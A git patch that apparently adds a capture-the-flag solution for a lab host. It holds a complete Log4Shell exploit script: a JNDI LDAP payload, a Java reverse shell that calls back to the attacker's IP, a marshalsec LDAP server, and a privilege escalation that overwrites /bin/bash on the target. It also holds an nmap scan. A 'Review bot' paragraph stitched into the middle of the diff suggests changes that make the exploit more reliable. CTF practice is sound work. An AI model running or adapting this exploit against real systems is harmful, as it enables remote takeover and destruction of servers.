From d80372c8ffcba8276fbd71c74ed15cd471cd81ac Mon Sep 17 00:00:00 2001
From: Roman Hergenreder
Date: Wed, 20 Dec 2023 18:21:20 +0100
Subject: [PATCH] Day 19 added

---
Day 19/.gitattributes | 1 +
Day 19/exploit.py | 173 +++++++++++++++++++++++
Day 19/machine | 51 +++++++
Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar | 3 +
4 files changed, 228 insertions(+)
create mode 100644 Day 19/.gitattributes
create mode 100644 Day 19/exploit.py
create mode 100644 Day 19/machine
create mode 100644 Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar
diff --git a/Day 19/.gitattributes b/Day 19/.gitattributes
new file mode 100644
index 0000000..1260584
--- /dev/null
+++ b/Day 19/.gitattributes
@@ -0,0 +1 @@
+marshalsec-0.0.3-SNAPSHOT-all.jar filter=lfs diff=lfs merge=lfs -text
diff --git a/Day 19/exploit.py b/Day 19/exploit.py
new file mode 100644
index 0000000..f387a52
--- /dev/null
+++ b/Day 19/exploit.py
@@ -0,0 +1,173 @@
+#!/usr/bin/env python
+
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+
+import os
+import io
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+import signal
+import threading
+
+IP_ADDRESS = util.get_address()
+BASE_URL = "https://7e11237e-9c61-46e2-92ca-cf53299a0447.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
+PROXIES = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
+
+def request(method, uri, **kwargs):
+ if not uri.startswith("/") and uri != "":
+ uri = "/" + uri
+
+ client = requests
+ if "session" in kwargs:
+ client = kwargs["session"]
+ del kwargs["session"]
+
+ if "allow_redirects" not in kwargs:
+ kwargs["allow_redirects"] = False
+
+ if "verify" not in kwargs:
+ kwargs["verify"] = False
+
+ if "proxies" not in kwargs:
+ kwargs["proxies"] = PROXIES
+
+ url = BASE_URL + uri
+ return client.request(method, url, **kwargs)
+
+def compile_java(shell_port):
+ java_code = f"""
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+
+public class Exploit {{
+
+ public Exploit() throws Exception {{
+ String host = "{IP_ADDRESS}";
+ int port = {shell_port};
+ String cmd = "/bin/sh";
+ Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
+ Socket s = new Socket(host,port);
+ InputStream pi=p.getInputStream(),
+ pe = p.getErrorStream(),
+ si = s.getInputStream();
+ OutputStream po = p.getOutputStream(), so = s.getOutputStream();
+ while (!s.isClosed()) {{
+ while (pi.available() > 0)
+ so.write(pi.read());
+ while (pe.available() > 0)
+ so.write(pe.read());
+ while (si.available() > 0)
+ po.write(si.read());
+ so.flush();
+ po.flush();
+ Thread.sleep(50);
+ try {{
+ p.exitValue();
+ break;
+ }} catch (Exception e) {{
+ }}
+ }}
+ p.destroy();
+ s.close();
+ }}
+}}
+"""
+
+ with open("Exploit.java", "w") as f:
+ f.write(java_code)
+
+ subprocess.run(["javac", "Exploit.java"])
+ with open("Exploit.class", "rb") as f:
+ java_class = f.read()
+
+ os.remove("Exploit.java")
+ os.remove("Exploit.class")
+ return java_class
+
+def send_message(msg):
+ json_data = { "name": "", "message": msg }
+ res = request("POST", "/up/sendmessage", json=json_data)
+ util.assert_status_code(res, 200)
+
+def get_privesc_code():
+ c_code = b"""#include
+#include
+int main() {
+ printf(\"Spawning a shell with -p parameter...\");
+ char *shell = \"/bin/sh\";
+ char *args[] = {shell, \"-p\", NULL};
+ execve(shell, args, NULL);
+ return 0;
+}
+"""
+
+ return base64.b64encode(c_code).decode()
+
+if __name__ == "__main__":
+
+ http_Port = 8000
+ shell_port = 9001
+ java_payload = compile_java(shell_port)
+ file_server = HttpFileServer("0.0.0.0", http_Port)
+ file_server.addFile("Exploit.class", java_payload)
+ file_server.enableLogging()
+ file_server.startBackground()
+
+ payload = f"${{jndi:ldap://{IP_ADDRESS}:1389/b}}"
+ payload_url = file_server.get_full_url("#Exploit", ip_addr=IP_ADDRESS)
+ ldap_process = None
+
+ def spawn_ldap_server():
+ global ldap_process
+ ldap_process = subprocess.Popen([
+ "java",
+ "-cp",
+ os.path.join("marshalsec-0.0.3-SNAPSHOT-all.jar"),
+ "marshalsec.jndi.LDAPRefServer",
+ payload_url
+ ])
+ ldap_process.wait()
+
+ print("[ ] Starting LDAP Server")
+ ldap_thread = threading.Thread(target=spawn_ldap_server)
+ ldap_thread.start()
+
+ print("[ ] Triggering log4j shell")
+ shell = rev_shell.trigger_background_shell(lambda: send_message(payload), shell_port)
+ shell.os = "unix"
+ print("[+] Got shell!")
+
+ privesc = get_privesc_code()
+ commands = [
+ f"echo {privesc} | base64 -d > /tmp/shell.c && gcc /tmp/shell.c -o /bin/bash",
+ "/santas-workshop/tool",
+ "s",
+ "cat /home/santa/flag.txt",
+ "exit"
+ ]
+ for cmd in commands:
+ shell.sendline(cmd)
+ time.sleep(0.5)
+
+ print("[+] Flag:", shell.raw_output.decode())
+ shell.close()
+
+ print("[ ] Stopping listeners...")
+ file_server.stop()
+ ldap_process.send_signal(signal.SIGINT)
+ ldap_thread.join()
\ No newline at end of file
diff --git a/Day 19/machine b/Day 19/machine
new file mode 100644
index 0000000..3db6ddc
--- /dev/null
+++ b/Day 19/machine
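Review bot: In `compile_java`, `subprocess.run(["javac", "Exploit.java"])` neither checks the exit status nor pins a class-file version, so a missing or failing javac only surfaces later as a FileNotFoundError on `Exploit.class`, and a class emitted by a current JDK will be refused with UnsupportedClassVersionError by the old JVM that remote codebase loading over LDAP requires in the first place (it is off by default from 8u191/11.0.1 on). I would change the line to `subprocess.run(["javac", "--release", "8", "Exploit.java"], check=True)` (`-source 1.8 -target 1.8` on a JDK 8 toolchain) and run the two `os.remove` calls in a `finally` so a failed compile does not leave Exploit.java behind. In the `__main__` block the marshalsec thread is started and `send_message(payload)` fires immediately with no check that port 1389 is bound; if the target resolves the JNDI reference before the JVM is listening the callback is lost, and `ldap_process` can still be `None` when `send_signal` runs at the end, so a short poll on the port before triggering would close both gaps. The privesc command overwrites `/bin/bash` on the target — presumably because `/santas-workshop/tool` executes it with elevated privileges — which is destructive for anything else on the box and deserves a comment stating that assumption, and BASE_URL is hard-coded to an instance ID that differs from the one in the `machine` notes, so taking the host from `sys.argv` would avoid editing the script per lab instance. Finally, the two `#include` lines in `get_privesc_code` show no header names in this rendering; if that is not an extraction artefact the C file will not build on the target, so confirm `<stdio.h>` and `<unistd.h>` are present.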
@@ -0,0 +1,51 @@
+Host: 3842c27c-9ff0-47de-b97a-9a9d5a892c87.idocker.vuln.land
+
+PORT STATE SERVICE VERSION
+22/tcp filtered ssh
+80/tcp open http Jetty 9.4.26v20200117
+|_http-title: Did not follow redirect to https://3842c27c-9ff0-47de-b97a-9a9d5a892c87.idocker.vuln.land:443/
+111/tcp open rpcbind 2-4 (RPC #100000)
+| rpcinfo:
+| program version port/proto service
+| 100000 2,3,4 111/tcp rpcbind
+| 100000 2,3,4 111/udp rpcbind
+| 100000 3,4 111/tcp6 rpcbind
+|_ 100000 3,4 111/udp6 rpcbind
+443/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
+| ssl-cert: Subject: commonName=*.idocker.vuln.land
+| Subject Alternative Name: DNS:*.idocker.vuln.land, DNS:idocker.vuln.land
+| Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
+| Public Key type: rsa
+| Public Key bits: 3072
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-09-04T00:00:00
+| Not valid after: 2024-09-08T23:59:59
+| MD5: 80d7:8bfe:9544:857d:d5ab:3419:4283:4228
+|_SHA-1: 7a7c:1086:65bb:52dd:6c97:238f:a29d:c680:1b8b:5a73
+| http-methods:
+|_ Supported Methods: GET HEAD
+|_http-server-header: Jetty(9.4.26.v20200117)
+|_http-title: Minecraft Dynamic Map
+| http-robots.txt: 5 disallowed entries
+|_/tiles/ /js/ /standalone/ /images/ /css/
+8080/tcp open http-proxy
+| fingerprint-strings:
+| FourOhFourRequest, GetRequest, HTTPOptions:
+| HTTP/1.0 401 Unauthorized
+| Content-Type: text/plain
+| Www-Authenticate: Basic realm="traefik"
+| Date: Mon, 18 Dec 2023 23:25:56 GMT
+| Content-Length: 17
+| Unauthorized
+| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, Socks5, TLSSessionReq, TerminalServerCookie:
+| HTTP/1.1 400 Bad Request
+| Content-Type: text/plain; charset=utf-8
+| Connection: close
+|_ Request
+|_http-title: Site doesn't have a title (text/plain).
+| http-auth:
+| HTTP/1.1 401 Unauthorized\x0D
+|_ Basic realm=traefik
+9100/tcp open jetdirect?
+42810/tcp open fmproduct 1-4 (RPC #1073741824)
+55555/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
diff --git a/Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar b/Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar
new file mode 100644
index 0000000..d4d21c5
--- /dev/null
+++ b/Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4f659fe73986787da27462f9cd2bf36603b47ceaa38b072338c369abdc2e1bd7
+size 42565306